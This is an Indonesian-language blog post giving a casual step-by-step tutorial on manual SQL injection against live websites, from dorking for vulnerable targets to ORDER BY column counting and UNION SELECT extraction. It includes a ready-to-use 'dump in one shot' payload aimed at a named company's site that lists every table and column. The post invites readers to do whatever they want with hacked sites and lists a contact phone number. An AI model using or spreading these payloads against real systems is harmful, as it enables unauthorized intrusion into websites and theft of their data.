Hai sob kali ini mimin akan memberikan tutorial sql injection manual
Bahan:1. Dorking (ada di blog kemarin)
2. Dios
3. internet
4. pc/hp:v
5. target vuln
6. kopi dan rokok biar gak tegang
Langkah-langah:
1. dorking atau kalo gak mau susah langsung target vulnnya diatas:)
2. beri petik di akhir parameter target
Kalo error Insya Allah vuln
3. cari jumlah colom eh kolom ato tabel sih lupa saya:v pokoknya buat cari nomor togel:v
dengan command +order+by+1--
contoh: http://www.target.com/readnews.php?id=4+order+by+1--
bila di seperti dicontoh gak keluar apa2 dan gak muncul error atau apa kek berarti vuln
4. teruskan sampai muncul error
contoh : http://www.target.com/readnews.php?id=4+order+by+1--
http://www.target.com/readnews.php?id=4+order+by+2--
http://www.target.com/readnews.php?id=4+order+by+3--
http://www.target.com/readnews.php?id=4+order+by+4--
http://www.target.com/readnews.php?id=4+order+by+5--
http://www.target.com/readnews.php?id=4+order+by+6-- = Error
mimin sampek 6 sudah error berarti jumlah colomnnya ada 5:)
5. tinggal kasih exploit +union+select+JumlahColoumn--
contoh: http://www.target.com/readnews.php?id=4+union+select+1,2,3,4,5--
disitu disitu ada nomor togelnya deh mwhehewheheh
contoh: http://www.kabelindo.co.id/readnews.php?id=4+union+select+1,concat(0x3c68313e44696f73204279204572726f72427974653c2f68313e,(select/**/group_concat(table_name,0x3a,column_name,0x3c62723e)/*!50000from*/information_schema.columns/*!12345where*/table_schema=database())),3,4,5--
8. terserah lu deh mau lu apain,mau lu entod terserah deh:v
9.ingat disini mimin gak bermaksud untuk mengajarkan jelek lho ya heheheh:)
kalo belum paham silahkan hubungi nomor ini
085837173009
terima kasih:)
0 Komentar